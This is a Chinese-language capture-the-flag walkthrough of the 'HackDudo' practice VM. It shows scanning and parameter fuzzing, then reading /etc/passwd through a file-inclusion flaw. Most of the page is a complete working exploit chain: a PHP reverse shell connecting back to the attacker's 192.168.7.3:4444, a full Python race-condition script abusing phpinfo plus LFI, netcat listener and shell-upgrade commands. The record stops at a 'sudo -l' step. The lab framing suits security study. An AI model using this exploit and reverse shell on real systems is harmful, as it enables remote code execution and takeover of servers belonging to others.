抑郁症健康 > 渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机

渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机

时间：2020-03-28 14:48:34

相关推荐

本文首发于微信公众号"伏波路上学安全",喜欢的小伙伴们请关注公众号持续获取新的文章.

声明：文章来自作者日常学习笔记，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究

靶机信息

下载地址:/entry/hackable-ii,711/

名称: hacksudo系列HackDudo

靶场:

难度: 简单

发布时间: 3月16日

提示信息: 无

目标: 2个flag

实验环境

攻击机:VMware kali 192.168.7.3靶机:Vbox linux IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

扫描到靶机地址为192.168.7.112

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV -p- 192.168.7.112 -oN hackdudo.nmap

扫描到8个开放端口,有80(http),111(rpc),1337(ssh),2049、33007、34515、36697、37453不清楚是什么端口,先来看80端口

Web渗透

访问80端口

http://192.168.7.112

首页信息:下面的提示说站长是Vishal并且在几年前作了一个视频游戏,图片是进入游戏的链接

源码中有些注释,信息包含了.htaccess,apple-touch-icon.png,root目录,domain目录,目前只有这些信息,先做个目录扫描同时看看是什么游戏

目录扫描

dirsearch -u http://192.168.7.112 -e php,html,txt,zip

目录扫描出来很多文件,info.php是phpinfo文件,file.php是一个文件访问的页面,还有一个web目录

看下游戏页面

http://192.168.7.112/game.html

游戏页面显示不全,而且下面的进度条一直再减少,画面加载后游戏便结束了,这里应该是需要调试JS,先不管他看其他的

Info.php页面

http://192.168.7.112/info.php

这是个phpinfo页面,暴露一些网站根目录apache配置文件等敏感信息

File.php页面

这是个文件页面,应该需要一些fuzz模糊测试找到正确参数

fuzz模糊测试

当攻击者发现一个页面并判断页面需要加参数才能正常访问时,便会用到模糊测试格式为page.php?FUZZ=xxx

wfuzz -c -w ../../../Dict/SecLists-.4/Discovery/Web-Content/common-and-french.txt -u http://192.168.7.112/file.php?FUZZ=/etc/passwd -t 1 |grep -v '238 Ch'

拿到参数file测试一下/etc/passwd

http://192.168.7.112/file.php?file=/etc/passwd

找到2个可以登录ssh的帐号root和hacksudo

再来看一下phpinfo信息

可以看到有文件上传权限,有上传有文件包含就可以反弹个shell到攻击机上

phpinfo+LFI(文件包含漏洞)反弹shell

简单介绍一下
原理
php会把post请求, 存储在临时文件中, 并在请求结束后删除临时文件
phpinfo中会显示_FILE变量, 其中会显示临时文件路径
所以我们通过发送大量的数据请求来拖延php删除临时文件的时间,同时查看FILE得到的临时文件位置,再用LFI漏洞进行包含执行
步骤
发送post请求到phpinfo, post的内容为一个创建shell文件的payload
通过有lfi漏洞的页面包含payload, payload被执行然后创建shell文件
通过lfi页面包含shell文件, 并传参, 从而进行利用

现在可以构造exp脚本来获取shell

exp下载地址:

/vulhub/vulhub/master/php/inclusion/exp.py

还需要修改一下

将phpinfo.php改成info.php,将lfi.php改成file.php

再将内容替换为反弹shell

<?phpset_time_limit (0);$VERSION = "1.0";$ip = '127.0.0.1'; // CHANGE THIS$port = 1234; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";}}?>

完整的payload:

#!/usr/bin/python import sysimport threadingimport socketdef setup(host, port):TAG="Security Test"PAYLOAD="""%s\r<?phpset_time_limit (0);$VERSION = "1.0";$ip = '192.168.7.3'; // CHANGE THIS$port = 4444; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";}}?>\r""" % TAGREQ1_DATA="""-----------------------------7dbff1ded0714\rContent-Disposition: form-data; name="dummyname"; filename="test.txt"\rContent-Type: text/plain\r\r%s-----------------------------7dbff1ded0714--\r""" % PAYLOADpadding="A" * 5000REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1\rCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\rHTTP_ACCEPT: """ + padding + """\rHTTP_USER_AGENT: """+padding+"""\rHTTP_ACCEPT_LANGUAGE: """+padding+"""\rHTTP_PRAGMA: """+padding+"""\rContent-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\rContent-Length: %s\rHost: %s\r\r%s""" %(len(REQ1_DATA),host,REQ1_DATA)#modify this to suit the LFI script LFIREQ="""GET /file.php?file=%s HTTP/1.1\rUser-Agent: Mozilla/4.0\rProxy-Connection: Keep-Alive\rHost: %s\r\r\r"""return (REQ1, TAG, LFIREQ)def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port))s2.connect((host, port))s.send(phpinforeq)d = ""while len(d) < offset:d += s.recv(offset)try:i = d.index("[tmp_name] => ")fn = d[i+17:i+31]except ValueError:return Nones2.send(lfireq % (fn, host))d = s2.recv(4096)s.close()s2.close()if d.find(tag) != -1:return fncounter=0class ThreadWorker(threading.Thread):def __init__(self, e, l, m, *args):threading.Thread.__init__(self)self.event = eself.lock = lself.maxattempts = mself.args = argsdef run(self):global counterwhile not self.event.is_set():with self.lock:if counter >= self.maxattempts:returncounter+=1try:x = phpInfoLFI(*self.args)if self.event.is_set():breakif x:print "\nGot it! Shell created in /tmp/g"self.event.set()except socket.error:returndef getOffset(host, port, phpinforeq):"""Gets offset of tmp_name in the php output"""s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host,port))s.send(phpinforeq)d = ""while True:i = s.recv(4096)d+=i if i == "":break# detect the final chunkif i.endswith("0\r\n\r\n"):breaks.close()i = d.find("[tmp_name] => ")if i == -1:raise ValueError("No php tmp_name in phpinfo output")print "found %s at %i" % (d[i:i+10],i)# padded up a bitreturn i+256def main():print "LFI With PHPInfo()"print "-=" * 30if len(sys.argv) < 2:print "Usage: %s host [port] [threads]" % sys.argv[0]sys.exit(1)try:host = socket.gethostbyname(sys.argv[1])except socket.error, e:print "Error with hostname %s: %s" % (sys.argv[1], e)sys.exit(1)port=80try:port = int(sys.argv[2])except IndexError:passexcept ValueError, e:print "Error with port %d: %s" % (sys.argv[2], e)sys.exit(1)poolsz=10try:poolsz = int(sys.argv[3])except IndexError:passexcept ValueError, e:print "Error with poolsz %d: %s" % (sys.argv[3], e)sys.exit(1)print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port)offset = getOffset(host, port, reqphp)sys.stdout.flush()maxattempts = 1000e = threading.Event()l = threading.Lock()print "Spawning worker pool (%d)..." % poolszsys.stdout.flush()tp = []for i in range(0,poolsz):tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))for t in tp:t.start()try:while not e.wait(1):if e.is_set():breakwith l:sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))sys.stdout.flush()if counter >= maxattempts:breakprintif e.is_set():print "Woot! \m/"else:print ":("except KeyboardInterrupt:print "\nTelling threads to shutdown..."e.set()print "Shuttin' down..."for t in tp:t.join()if __name__=="__main__":main()

payload准备好后就可以在攻击机上监听4444端口

nc -lvvp 4444

开始执行payload

python lfiexp.py 靶机IP 靶机端口线程数python lfiexp.py 192.168.7.112 80 100

在发送第276次个数据包时上传成功了

攻击机上出现shell界面,现在切换到可以交互的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm

需要切换到完整的可以看之前的文章

查找下敏感信息

sudo -l